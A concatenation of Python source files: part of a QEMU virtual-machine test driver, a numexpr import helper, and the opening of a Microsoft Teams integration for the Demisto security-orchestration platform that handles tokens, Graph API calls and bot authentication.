f"echo -n {content_b64} | base64 -d > {target}",
)
def copy_from_host(self, source: str, target: str) -> None:
"""Copy a file from the host into the guest via the `shared_dir` shared
among all the VMs (using a temporary directory).
"""
host_src = Path(source)
vm_target = Path(target)
with tempfile.TemporaryDirectory(dir=self.shared_dir) as shared_td:
shared_temp = Path(shared_td)
host_intermediate = shared_temp / host_src.name
vm_shared_temp = Path("/tmp/shared") / shared_temp.name
vm_intermediate = vm_shared_temp / host_src.name
self.succeed(make_command(["mkdir", "-p", vm_shared_temp]))
if host_src.is_dir():
shutil.copytree(host_src, host_intermediate)
else:
shutil.copy(host_src, host_intermediate)
self.succeed(make_command(["mkdir", "-p", vm_target.parent]))
self.succeed(make_command(["cp", "-r", vm_intermediate, vm_target]))
def copy_from_vm(self, source: str, target_dir: str = "") -> None:
"""Copy a file from the VM (specified by an in-VM source path) to a path
relative to `$out`. The file is copied via the `shared_dir` shared among
all the VMs (using a temporary directory).
"""
# Compute the source, target, and intermediate shared file names
out_dir = Path(os.environ.get("out", os.getcwd()))
vm_src = Path(source)
with tempfile.TemporaryDirectory(dir=self.shared_dir) as shared_td:
shared_temp = Path(shared_td)
vm_shared_temp = Path("/tmp/shared") / shared_temp.name
vm_intermediate = vm_shared_temp / vm_src.name
intermediate = shared_temp / vm_src.name
# Copy the file to the shared directory inside VM
self.succeed(make_command(["mkdir", "-p", vm_shared_temp]))
self.succeed(make_command(["cp", "-r", vm_src, vm_intermediate]))
abs_target = out_dir / target_dir / vm_src.name
abs_target.parent.mkdir(exist_ok=True, parents=True)
# Copy the file from the shared directory outside VM
if intermediate.is_dir():
shutil.copytree(intermediate, abs_target)
else:
shutil.copy(intermediate, abs_target)
def dump_tty_contents(self, tty: str) -> None:
"""Debugging: Dump the contents of the TTY<n>"""
self.execute("fold -w 80 /dev/vcs{} | systemd-cat".format(tty))
def _get_screen_text_variants(self, model_ids: Iterable[int]) -> List[str]:
with tempfile.TemporaryDirectory() as tmpdir:
screenshot_path = os.path.join(tmpdir, "ppm")
self.send_monitor_command(f"screendump {screenshot_path}")
return _perform_ocr_on_screenshot(screenshot_path, model_ids)
def get_screen_text_variants(self) -> List[str]:
return self._get_screen_text_variants([0, 1, 2])
def get_screen_text(self) -> str:
return self._get_screen_text_variants([2])[0]
def wait_for_text(self, regex: str) -> None:
def screen_matches(last: bool) -> bool:
variants = self.get_screen_text_variants()
for text in variants:
if re.search(regex, text) is not None:
return True
if last:
self.log("Last OCR attempt failed. Text was: {}".format(variants))
return False
with self.nested("waiting for {} to appear on screen".format(regex)):
retry(screen_matches)
def wait_for_console_text(self, regex: str) -> None:
with self.nested("waiting for {} to appear on console".format(regex)):
# Buffer the console output, this is needed
# to match multiline regexes.
console = io.StringIO()
while True:
try:
console.write(self.last_lines.get())
except queue.Empty:
self.sleep(1)
continue
console.seek(0)
matches = re.search(regex, console.read())
if matches is not None:
return
def send_key(self, key: str) -> None:
key = CHAR_TO_KEY.get(key, key)
self.send_monitor_command("sendkey {}".format(key))
time.sleep(0.01)
def start(self) -> None:
if self.booted:
return
self.log("starting vm")
def clear(path: Path) -> Path:
if path.exists():
path.unlink()
return path
def create_socket(path: Path) -> socket.socket:
s = socket.socket(family=socket.AF_UNIX, type=socket.SOCK_STREAM)
s.bind(str(path))
s.listen(1)
return s
monitor_socket = create_socket(clear(self.monitor_path))
shell_socket = create_socket(clear(self.shell_path))
self.process = self.start_command.run(
self.state_dir,
self.shared_dir,
self.monitor_path,
self.shell_path,
)
self.monitor, _ = monitor_socket.accept()
self.shell, _ = shell_socket.accept()
# Store last serial console lines for use
# of wait_for_console_text
self.last_lines: Queue = Queue()
def process_serial_output() -> None:
assert self.process
assert self.process.stdout
for _line in self.process.stdout:
# Ignore undecodable bytes that may occur in boot menus
line = _line.decode(errors="ignore").replace("\r", "").rstrip()
self.last_lines.put(line)
self.log_serial(line)
self.serial_thread = threading.Thread(target=process_serial_output)
self.serial_thread.start()
self.wait_for_monitor_prompt()
self.pid = self.process.pid
self.booted = True
self.log("QEMU running (pid {})".format(self.pid))
def cleanup_statedir(self) -> None:
shutil.rmtree(self.state_dir)
rootlog.log(f"deleting VM state directory {self.state_dir}")
rootlog.log("if you want to keep the VM state, pass --keep-vm-state")
def shutdown(self) -> None:
if not self.booted:
return
assert self.shell
self.shell.send("poweroff\n".encode())
self.wait_for_shutdown()
def crash(self) -> None:
if not self.booted:
return
self.log("forced crash")
self.send_monitor_command("quit")
self.wait_for_shutdown()
def wait_for_x(self) -> None:
"""Wait until it is possible to connect to the X server. Note that
testing the existence of /tmp/.X11-unix/X0 is insufficient.
"""
def check_x(_: Any) -> bool:
cmd = (
"journalctl -b SYSLOG_IDENTIFIER=systemd | "
+ 'grep "Reached target Current graphical"'
)
status, _ = self.execute(cmd)
if status != 0:
return False
status, _ = self.execute("[ -e /tmp/.X11-unix/X0 ]")
return status == 0
with self.nested("waiting for the X11 server"):
retry(check_x)
def get_window_names(self) -> List[str]:
return self.succeed(
r"xwininfo -root -tree | sed 's/.*0x[0-9a-f]* \"\([^\"]*\)\".*/\1/; t; d'"
).splitlines()
def wait_for_window(self, regexp: str) -> None:
pattern = re.compile(regexp)
def window_is_visible(last_try: bool) -> bool:
names = self.get_window_names()
if last_try:
self.log(
"Last chance to match {} on the window list,".format(regexp)
+ " which currently contains: "
+ ", ".join(names)
)
return any(pattern.search(name) for name in names)
with self.nested("waiting for a window to appear"):
retry(window_is_visible)
def sleep(self, secs: int) -> None:
# We want to sleep in *guest* time, not *host* time.
self.succeed(f"sleep {secs}")
def forward_port(self, host_port: int = 8080, guest_port: int = 80) -> None:
"""Forward a TCP port on the host to a TCP port on the guest.
Useful during interactive testing.
"""
self.send_monitor_command(
"hostfwd_add tcp::{}-:{}".format(host_port, guest_port)
)
def block(self) -> None:
"""Make the machine unreachable by shutting down eth1 (the multicast
interface used to talk to the other VMs). We keep eth0 up so that
the test driver can continue to talk to the machine.
"""
self.send_monitor_command("set_link virtio-net-pci.1 off")
def unblock(self) -> None:
"""Make the machine reachable."""
self.send_monitor_command("set_link virtio-net-pci.1 on")
def release(self) -> None:
if self.pid is None:
return
rootlog.info(f"kill machine (pid {self.pid})")
assert self.process
assert self.shell
assert self.monitor
assert self.serial_thread
self.process.terminate()
self.shell.close()
self.monitor.close()
self.serial_thread.join()
def run_callbacks(self) -> None:
for callback in self.callbacks:
callback()
|
numexpr.py
|
"""Tools for working with Numexp.
At present all this module provides is a safe way of importing
``numexpr``. This prevents a hard crash (i.e. segfault) when the MKL
is enabled but cannot be found. Just go:
>>> from mmfutils.performance.numexpr import numexpr
"""
__all__ = ['numexpr']
numexpr = False
try:
import numexpr
# These convolutions are needed to deal with a common failure mode: If the
# MKL libraries cannot be found, then the whole python process crashes with
# a library error. We test this in a separate process and if it fails, we
# disable the MKL.
import multiprocessing
def check(q): # pragma: nocover
import numexpr
q.put(numexpr.get_vml_version())
q = multiprocessing.Queue()
_p = multiprocessing.Process(target=check, args=[q])
_p.start()
_p.join()
if q.empty(): # pragma: nocover
# Fail
numexpr.use_vml = False
except ImportError: # pragma: nocover
pass
|
MicrosoftTeams.py
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
''' IMPORTS '''
import requests
from distutils.util import strtobool
from flask import Flask, request, Response
from gevent.pywsgi import WSGIServer
import jwt
import time
from threading import Thread
from typing import Match, Union, Optional, cast, Dict, Any, List, Tuple
import re
from jwt.algorithms import RSAAlgorithm
from tempfile import NamedTemporaryFile
# Disable insecure warnings
requests.packages.urllib3.disable_warnings()
''' GLOBAL VARIABLES'''
PARAMS: dict = demisto.params()
BOT_ID: str = PARAMS.get('bot_id', '')
BOT_PASSWORD: str = PARAMS.get('bot_password', '')
USE_SSL: bool = not PARAMS.get('insecure', False)
APP: Flask = Flask('demisto-teams')
PLAYGROUND_INVESTIGATION_TYPE: int = 9
GRAPH_BASE_URL: str = 'https://graph.microsoft.com'
INCIDENT_TYPE: str = PARAMS.get('incidentType', '')
URL_REGEX: str = r'http[s]?://(?:[a-zA-Z]|[0-9]|[:/$_@.&+#-]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
ENTITLEMENT_REGEX: str = \
r'(\{){0,1}[0-9a-fA-F]{8}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{4}\-[0-9a-fA-F]{12}(\}){0,1}'
MENTION_REGEX = r'^@([^@;]+);| @([^@;]+);'
ENTRY_FOOTER: str = 'From Microsoft Teams'
MESSAGE_TYPES: dict = {
'mirror_entry': 'mirrorEntry',
'incident_opened': 'incidentOpened',
'status_changed': 'incidentStatusChanged'
}
''' HELPER FUNCTIONS '''
def epoch_seconds(d: datetime = None) -> int:
"""
Return the number of seconds for given date. If no date, return current.
:param d: timestamp datetime object
:return: timestamp in epoch
"""
if not d:
d = datetime.utcnow()
return int((d - datetime.utcfromtimestamp(0)).total_seconds())
def error_parser(resp_err: requests.Response, api: str = 'graph') -> str:
"""
Parses Microsoft API error message from Requests response
:param resp_err: response with error
:param api: API to query (graph/bot)
:return: string of error
"""
try:
response: dict = resp_err.json()
if api == 'graph':
error: dict = response.get('error', {})
err_str: str = f"{error.get('code', '')}: {error.get('message', '')}"
if err_str:
return err_str
elif api == 'bot':
error_description: str = response.get('error_description', '')
if error_description:
return error_description
# If no error message
raise ValueError()
except ValueError:
return resp_err.text
def translate_severity(severity: str) -> int:
"""
Translates Demisto text severity to int severity
:param severity: Demisto text severity
:return: Demisto integer severity
"""
severity_dictionary = {
'Low': 1,
'Medium': 2,
'High': 3,
'Critical': 4
}
return severity_dictionary.get(severity, 0)
def create_incidents(demisto_user: dict, incidents: list) -> dict:
"""
Creates incidents according to a provided JSON object
:param demisto_user: The demisto user associated with the request (if exists)
:param incidents: The incidents JSON
:return: The creation result
"""
if demisto_user:
data = demisto.createIncidents(incidents, userID=demisto_user.get('id', ''))
else:
data = demisto.createIncidents(incidents)
return data
def process_incident_create_message(demisto_user: dict, message: str) -> str:
"""
Processes an incident creation message
:param demisto_user: The Demisto user associated with the message (if exists)
:param message: The creation message
:return: Creation result
"""
json_pattern: str = r'(?<=json=).*'
name_pattern: str = r'(?<=name=).*'
type_pattern: str = r'(?<=type=).*'
json_match: Optional[Match[str]] = re.search(json_pattern, message)
created_incident: Union[dict, list]
data: str = str()
if json_match:
if re.search(name_pattern, message) or re.search(type_pattern, message):
data = 'No other properties other than json should be specified.'
else:
incidents_json: str = json_match.group()
incidents: Union[dict, list] = json.loads(incidents_json.replace('“', '"').replace('”', '"'))
if not isinstance(incidents, list):
incidents = [incidents]
created_incident = create_incidents(demisto_user, incidents)
if not created_incident:
data = 'Failed creating incidents.'
else:
name_match: Optional[Match[str]] = re.search(name_pattern, message)
if not name_match:
data = 'Please specify arguments in the following manner: name=<name> type=[type] or json=<json>.'
else:
incident_name: str = re.sub('type=.*', '', name_match.group()).strip()
incident_type: str = str()
type_match: Optional[Match[str]] = re.search(type_pattern, message)
if type_match:
incident_type = re.sub('name=.*', '', type_match.group()).strip()
incident: dict = {'name': incident_name}
incident_type = incident_type or INCIDENT_TYPE
if incident_type:
incident['type'] = incident_type
created_incident = create_incidents(demisto_user, [incident])
if not created_incident:
data = 'Failed creating incidents.'
if created_incident:
if isinstance(created_incident, list):
created_incident = created_incident[0]
created_incident = cast(Dict[Any, Any], created_incident)
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
data = f"Successfully created incident {created_incident.get('name', '')}.\n" \
f"View it on: {server_link}#/WarRoom/{created_incident.get('id', '')}"
return data
def is_investigation_mirrored(investigation_id: str, mirrored_channels: list) -> int:
"""
Checks if investigation is already mirrored
:param investigation_id: Investigation ID to check if mirrored
:param mirrored_channels: List of mirrored channels to check if investigation is mirrored in
:return: Index in mirrored channels list if mirrored, else -1
"""
for index, channel in enumerate(mirrored_channels):
if channel.get('investigation_id') == investigation_id:
return index
return -1
def urlify_hyperlinks(message: str) -> str:
"""
Turns URL to markdown hyper-link
e.g. https://www.demisto.com -> [https://www.demisto.com](https://www.demisto.com)
:param message: Message to look for URLs in
:return: Formatted message with hyper-links
"""
formatted_message: str = message
# URLify markdown hyperlinks
urls = re.findall(URL_REGEX, message)
for url in urls:
formatted_message = formatted_message.replace(url, f'[{url}]({url})')
return formatted_message
def get_team_member(integration_context: dict, team_member_id: str) -> dict:
"""
Searches for a team member
:param integration_context: Cached object to search for team member in
:param team_member_id: Team member ID to search for
:return: Found team member object
"""
team_member: dict = dict()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for member in team_members:
if member.get('id') == team_member_id:
team_member['username'] = member.get('name', '')
team_member['user_email'] = member.get('userPrincipalName', '')
return team_member
raise ValueError('Team member was not found')
def get_team_member_id(requested_team_member: str, integration_context: dict) -> str:
"""
Gets team member ID based on name, email or principal name
:param requested_team_member: Team member name / principal name / email to look for
:param integration_context: Cached object to search for team member in
:return: Team member ID
"""
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
team_members: list = team.get('team_members', [])
for team_member in team_members:
if requested_team_member in {team_member.get('name', ''), team_member.get('userPrincipalName', '')}:
return team_member.get('id')
raise ValueError(f'Team member {requested_team_member} was not found')
def create_adaptive_card(body: list, actions: list = None) -> dict:
"""
Creates Microsoft Teams adaptive card object given body and actions
:param body: Adaptive card data
:param actions: Adaptive card actions
:return: Adaptive card object
"""
adaptive_card: dict = {
'contentType': 'application/vnd.microsoft.card.adaptive',
'content': {
'$schema': 'http://adaptivecards.io/schemas/adaptive-card.json',
'version': '1.0',
'type': 'AdaptiveCard',
'body': body
}
}
if actions:
adaptive_card['content']['actions'] = actions
return adaptive_card
def process_tasks_list(data_by_line: list) -> dict:
"""
Processes tasks list assigned to user given from Demisto server and creates adaptive card
:param data_by_line: List of tasks to process
:return: Adaptive card of assigned tasks
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'Task:',
'value': split_data[0]
},
{
'title': 'Incident:',
'value': split_data[1]
},
{
'title': 'Due:',
'value': split_data[2]
},
{
'title': 'Link:',
'value': f'[{split_data[3]}]({split_data[3]})'
}
]
})
return create_adaptive_card(body)
def process_incidents_list(data_by_line: list) -> dict:
"""
Processes incidents list assigned to user given from Demisto server and creates adaptive card
:param data_by_line: List of incidents to process
:return: Adaptive card of assigned incidents
"""
body: list = list()
for line in data_by_line[2:]:
split_data: list = [stat.strip() for stat in line.split('|')]
body.append({
'type': 'FactSet',
'facts': [
{
'title': 'ID:',
'value': split_data[0]
},
{
'title': 'Name:',
'value': split_data[1]
},
{
'title': 'Status:',
'value': split_data[2]
},
{
'title': 'Type:',
'value': split_data[3]
},
{
'title': 'Owner:',
'value': split_data[4]
},
{
'title': 'Created:',
'value': split_data[5]
},
{
'title': 'Link:',
'value': f'[{split_data[6]}]({split_data[6]})'
}
]
})
return create_adaptive_card(body)
def process_mirror_or_unknown_message(message: str) -> dict:
"""
Processes mirror investigation command or unknown direct message and creates adaptive card
:param message: The direct message to process
:return: Adaptive card of mirror response / unknown message
"""
body: list = [{
'type': 'TextBlock',
'text': message.replace('\n', '\n\n'),
'wrap': True
}]
return create_adaptive_card(body)
def process_ask_user(message: str) -> dict:
"""
Processes ask user message and creates adaptive card
:param message: The question object
:return: Adaptive card of the question to send
"""
message_object: dict = json.loads(message)
text: str = message_object.get('message_text', '')
entitlement: str = message_object.get('entitlement', '')
options: list = message_object.get('options', [])
investigation_id: str = message_object.get('investigation_id', '')
task_id: str = message_object.get('task_id', '')
body = [
{
'type': 'TextBlock',
'text': text
}
]
actions: list = list()
for option in options:
actions.append({
'type': 'Action.Submit',
'title': option,
'data': {
'response': option,
'entitlement': entitlement,
'investigation_id': investigation_id,
'task_id': task_id
}
})
return create_adaptive_card(body, actions)
def get_bot_access_token() -> str:
"""
Retrieves Bot Framework API access token, either from cache or from Microsoft
:return: The Bot Framework API access token
"""
integration_context: dict = demisto.getIntegrationContext()
access_token: str = integration_context.get('bot_access_token', '')
valid_until: int = integration_context.get('bot_valid_until', int)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
url: str = 'https://login.microsoftonline.com/botframework.com/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'client_secret': BOT_PASSWORD,
'scope': 'https://api.botframework.com/.default'
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response, 'bot')
raise ValueError(f'Failed to get bot access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['bot_access_token'] = access_token
integration_context['bot_valid_until'] = time_now + expires_in
demisto.setIntegrationContext(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get bot access token')
def get_graph_access_token() -> str:
"""
Retrieves Microsoft Graph API access token, either from cache or from Microsoft
:return: The Microsoft Graph API access token
"""
integration_context: dict = demisto.getIntegrationContext()
access_token: str = integration_context.get('graph_access_token', '')
valid_until: int = integration_context.get('graph_valid_until', int)
if access_token and valid_until:
if epoch_seconds() < valid_until:
return access_token
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly.'
)
url: str = f'https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/token'
data: dict = {
'grant_type': 'client_credentials',
'client_id': BOT_ID,
'scope': 'https://graph.microsoft.com/.default',
'client_secret': BOT_PASSWORD
}
response: requests.Response = requests.post(
url,
data=data,
verify=USE_SSL
)
if not response.ok:
error = error_parser(response)
raise ValueError(f'Failed to get Graph access token [{response.status_code}] - {error}')
try:
response_json: dict = response.json()
access_token = response_json.get('access_token', '')
expires_in: int = response_json.get('expires_in', 3595)
time_now: int = epoch_seconds()
time_buffer = 5 # seconds by which to shorten the validity period
if expires_in - time_buffer > 0:
expires_in -= time_buffer
integration_context['graph_access_token'] = access_token
integration_context['graph_valid_until'] = time_now + expires_in
demisto.setIntegrationContext(integration_context)
return access_token
except ValueError:
raise ValueError('Failed to get Graph access token')
def http_request(
method: str, url: str = '', json_: dict = None, api: str = 'graph'
) -> Union[dict, list]:
"""
A wrapper for requests lib to send our requests and handle requests and responses better
Headers to be sent in requests
:param method: any restful method
:param url: URL to query
:param json_: HTTP JSON body
:param api: API to query (graph/bot)
:return: requests.json()
"""
if api == 'graph':
access_token = get_graph_access_token()
else: # Bot Framework API
access_token = get_bot_access_token()
headers: dict = {
'Authorization': f'Bearer {access_token}',
'Content-Type': 'application/json',
'Accept': 'application/json'
}
try:
response: requests.Response = requests.request(
method,
url,
headers=headers,
json=json_,
verify=USE_SSL
)
if not response.ok:
error: str = error_parser(response, api)
raise ValueError(f'Error in API call to Microsoft Teams: [{response.status_code}] - {error}')
if response.status_code in {202, 204}:
# Delete channel or remove user from channel return 204 if successful
# Update message returns 202 if the request has been accepted for processing
return {}
if response.status_code == 201:
# For channel creation query, we get a body in the response, otherwise we should just return
if not response.content:
return {}
try:
return response.json()
except ValueError:
raise ValueError(f'Error in API call to Microsoft Teams: {response.text}')
except requests.exceptions.ConnectTimeout:
error_message = 'Connection Timeout Error - potential reason may be that Microsoft Teams is not ' \
'accessible from your host.'
raise ConnectionError(error_message)
except requests.exceptions.SSLError:
error_message = 'SSL Certificate Verification Failed - try selecting \'Trust any certificate\' in ' \
'the integration configuration.'
raise ConnectionError(error_message)
except requests.exceptions.ProxyError:
error_message = 'Proxy Error - if \'Use system proxy settings\' in the integration configuration has been ' \
'selected, try deselecting it.'
raise ConnectionError(error_message)
def integration_health():
bot_framework_api_health = 'Operational'
graph_api_health = 'Operational'
try:
get_bot_access_token()
except ValueError as e:
bot_framework_api_health = f'Non operational - {str(e)}'
try:
get_graph_access_token()
except ValueError as e:
graph_api_health = f'Non operational - {str(e)}'
api_health_output: list = [{
'Bot Framework API Health': bot_framework_api_health,
'Graph API Health': graph_api_health
}]
api_health_human_readble: str = tableToMarkdown('Microsoft API Health', api_health_output)
mirrored_channels_output = list()
integration_context: dict = demisto.getIntegrationContext()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
mirrored_channels_output.append({
'Team': team.get('team_name'),
'Channel': channel.get('channel_name'),
'Investigation ID': channel.get('investigation_id')
})
mirrored_channels_human_readable: str
if mirrored_channels_output:
mirrored_channels_human_readable = tableToMarkdown(
'Microsoft Teams Mirrored Channels', mirrored_channels_output
)
else:
mirrored_channels_human_readable = 'No mirrored channels.'
demisto.results(api_health_human_readble + mirrored_channels_human_readable)
def validate_auth_header(headers: dict) -> bool:
"""
Validated authorization header provided in the bot activity object
:param headers: Bot activity headers
:return: True if authorized, else False
"""
parts: list = headers.get('Authorization', '').split(' ')
if len(parts) != 2:
return False
scehma: str = parts[0]
jwt_token: str = parts[1]
if scehma != 'Bearer' or not jwt_token:
demisto.info('Authorization header validation - failed to verify schema')
return False
decoded_payload: dict = jwt.decode(jwt_token, verify=False)
issuer: str = decoded_payload.get('iss', '')
if issuer != 'https://api.botframework.com':
demisto.info('Authorization header validation - failed to verify issuer')
return False
integration_context: dict = demisto.getIntegrationContext()
open_id_metadata: dict = json.loads(integration_context.get('open_id_metadata', '{}'))
keys: list = open_id_metadata.get('keys', [])
unverified_headers: dict = jwt.get_unverified_header(jwt_token)
key_id: str = unverified_headers.get('kid', '')
key_object: dict = dict()
# Check if we got the requested key in cache
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in cache, getting new keys
try:
open_id_url: str = 'https://login.botframework.com/v1/.well-known/openidconfiguration'
response: requests.Response = requests.get(open_id_url, verify=USE_SSL)
if not response.ok:
demisto.info(f'Authorization header validation failed to fetch open ID config - {response.reason}')
return False
response_json: dict = response.json()
jwks_uri: str = response_json.get('jwks_uri', '')
keys_response: requests.Response = requests.get(jwks_uri, verify=USE_SSL)
if not keys_response.ok:
demisto.info(f'Authorization header validation failed to fetch keys - {response.reason}')
return False
keys_response_json: dict = keys_response.json()
keys = keys_response_json.get('keys', [])
open_id_metadata['keys'] = keys
except ValueError:
demisto.info('Authorization header validation - failed to parse keys response')
return False
if not keys:
# Didn't get new keys
demisto.info('Authorization header validation - failed to get keys')
return False
# Find requested key in new keys
for key in keys:
if key.get('kid') == key_id:
key_object = key
break
if not key_object:
# Didn't find requested key in new keys
demisto.info('Authorization header validation - failed to find relevant key')
return False
endorsements: list = key_object.get('endorsements', [])
if not endorsements or 'msteams' not in endorsements:
demisto.info('Authorization header validation - failed to verify endorsements')
return False
public_key: str = RSAAlgorithm.from_jwk(json.dumps(key_object))
options = {
'verify_aud': False,
'verify_exp': True
}
decoded_payload = jwt.decode(jwt_token, public_key, options=options)
audience_claim: str = decoded_payload.get('aud', '')
if audience_claim != demisto.params().get('bot_id'):
demisto.info('Authorization header validation - failed to verify audience_claim')
return False
integration_context['open_id_metadata'] = json.dumps(open_id_metadata)
demisto.setIntegrationContext(integration_context)
return True
''' COMMANDS + REQUESTS FUNCTIONS '''
def get_team_aad_id(team_name: str) -> str:
"""
Gets Team AAD ID
:param team_name: Team name to get AAD ID of
:return: team AAD ID
"""
integration_context: dict = demisto.getIntegrationContext()
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team_name == team.get('team_name', ''):
return team.get('team_aad_id', '')
url: str = f"{GRAPH_BASE_URL}/beta/groups?$filter=resourceProvisioningOptions/Any(x:x eq 'Team')"
response: dict = cast(Dict[Any, Any], http_request('GET', url))
teams = response.get('value', [])
for team in teams:
if team.get('displayName', '') == team_name:
return team.get('id', '')
raise ValueError('Could not find requested team.')
# def add_member_to_team(user_principal_name: str, team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/groups/{team_id}/members/$ref'
# requestjson_: dict = {
# '@odata.id': f'{GRAPH_BASE_URL}/v1.0/directoryObjects/{user_principal_name}'
# }
# http_request('POST', url, json_=requestjson_)
def get_users() -> list:
"""
Retrieves list of AAD users
:return: List of AAD users
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/users'
users: dict = cast(Dict[Any, Any], http_request('GET', url))
return users.get('value', [])
def add_user_to_channel(team_aad_id: str, channel_id: str, user_id: str):
"""
Request for adding user to channel
"""
url: str = f'{GRAPH_BASE_URL}/beta/teams/{team_aad_id}/channels/{channel_id}/members'
requestjson_: dict = {
'@odata.type': '#microsoft.graph.aadUserConversationMember',
'roles': [],
'user@odata.bind': f'https://graph.microsoft.com/beta/users/{user_id}' # disable-secrets-detection
}
http_request('POST', url, json_=requestjson_)
def add_user_to_channel_command():
"""
Add user to channel (private channel only as still in beta mode)
"""
channel_name: str = demisto.args().get('channel', '')
team_name: str = demisto.args().get('team', '')
member = demisto.args().get('member', '')
users: list = get_users()
user_id: str = str()
found_member: bool = False
for user in users:
if member in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
found_member = True
user_id = user.get('id', '')
break
if not found_member:
raise ValueError(f'User {member} was not found')
team_aad_id = get_team_aad_id(team_name)
channel_id = get_channel_id(channel_name, team_aad_id, investigation_id=None)
add_user_to_channel(team_aad_id, channel_id, user_id)
demisto.results(f'The User "{member}" has been added to channel "{channel_name}" successfully.')
# def create_group_request(
# display_name: str, mail_enabled: bool, mail_nickname: str, security_enabled: bool,
# owners_ids: list, members_ids: list = None
# ) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups'
# data: dict = {
# 'displayName': display_name,
# 'groupTypes': ['Unified'],
# 'mailEnabled': mail_enabled,
# 'mailNickname': mail_nickname,
# 'securityEnabled': security_enabled,
# 'owners@odata.bind': owners_ids,
# 'members@odata.bind': members_ids or owners_ids
# }
# group_creation_response: dict = cast(Dict[Any, Any], http_request('POST', url, json_=data))
# group_id: str = group_creation_response.get('id', '')
# return group_id
#
#
# def create_team_request(group_id: str) -> str:
# url = f'{GRAPH_BASE_URL}/v1.0/groups/{group_id}/team'
# team_creation_response: dict = cast(Dict[Any, Any], http_request('PUT', url, json_={}))
# team_id: str = team_creation_response.get('id', '')
# return team_id
#
#
# def add_bot_to_team(team_id: str):
# url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_id}/installedApps'
# bot_app_id: str = ''
# data: dict = {
# 'teamsApp@odata.bind': f'https://graph.microsoft.com/v1.0/appCatalogs/teamsApps/{bot_app_id}'
# }
# print(http_request('POST', url, json_=data))
#
#
# def create_team():
# display_name: str = demisto.args().get('display_name', '')
# mail_enabled: bool = bool(strtobool(demisto.args().get('mail_enabled', True)))
# mail_nickname: str = demisto.args().get('mail_nickname', '')
# security_enabled: bool = bool(strtobool(demisto.args().get('security_enabled', True)))
# owners = argToList(demisto.args().get('owner', ''))
# members = argToList(demisto.args().get('members', ''))
# owners_ids: list = list()
# members_ids: list = list()
# users: list = get_users()
# user_id: str = str()
# for member in members:
# found_member: bool = False
# for user in users:
# if member in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_member = True
# user_id = user.get('id', '')
# members_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_member:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {member} was not found',
# 'ContentsFormat': formats['text']
# })
# for owner in owners:
# found_owner: bool = False
# for user in users:
# if owner in {user.get('displayName', ''), user.get('mail'), user.get('userPrincipalName')}:
# found_owner = True
# user_id = user.get('id', '')
# owners_ids.append(f'https://graph.microsoft.com/v1.0/users/{user_id}')
# break
# if not found_owner:
# demisto.results({
# 'Type': entryTypes['warning'],
# 'Contents': f'User {owner} was not found',
# 'ContentsFormat': formats['text']
# })
# if not owners_ids:
# raise ValueError('Could not find given users to be Team owners.')
# group_id: str = create_group_request(
# display_name, mail_enabled, mail_nickname, security_enabled, owners_ids, members_ids
# )
# team_id: str = create_team_request(group_id)
# add_bot_to_team(team_id)
# demisto.results(f'Team {display_name} was created successfully')
def create_channel(team_aad_id: str, channel_name: str, channel_description: str = '') -> str:
"""
Creates a Microsoft Teams channel
:param team_aad_id: Team AAD ID to create channel in
:param channel_name: Name of channel to create
:param channel_description: Description of channel to create
:return: ID of created channel
"""
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
request_json: dict = {
'displayName': channel_name,
'description': channel_description
}
channel_data: dict = cast(Dict[Any, Any], http_request('POST', url, json_=request_json))
channel_id: str = channel_data.get('id', '')
return channel_id
def create_channel_command():
channel_name: str = demisto.args().get('channel_name', '')
channel_description: str = demisto.args().get('description', '')
team_name: str = demisto.args().get('team', '')
team_aad_id = get_team_aad_id(team_name)
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
if channel_id:
demisto.results(f'The channel "{channel_name}" was created successfully')
def get_channel_id(channel_name: str, team_aad_id: str, investigation_id: str = None) -> str:
"""
Retrieves Microsoft Teams channel ID
:param channel_name: Name of channel to get ID of
:param team_aad_id: AAD ID of team to search channel in
:param investigation_id: Demisto investigation ID to search mirrored channel of
:return: Requested channel ID
"""
investigation_id = investigation_id or str()
integration_context: dict = demisto.getIntegrationContext()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels: list = team.get('mirrored_channels', [])
for channel in mirrored_channels:
if channel.get('channel_name') == channel_name or channel.get('investigation_id') == investigation_id:
return channel.get('channel_id')
url: str = f'{GRAPH_BASE_URL}/v1.0/teams/{team_aad_id}/channels'
response: dict = cast(Dict[Any, Any], http_request('GET', url))
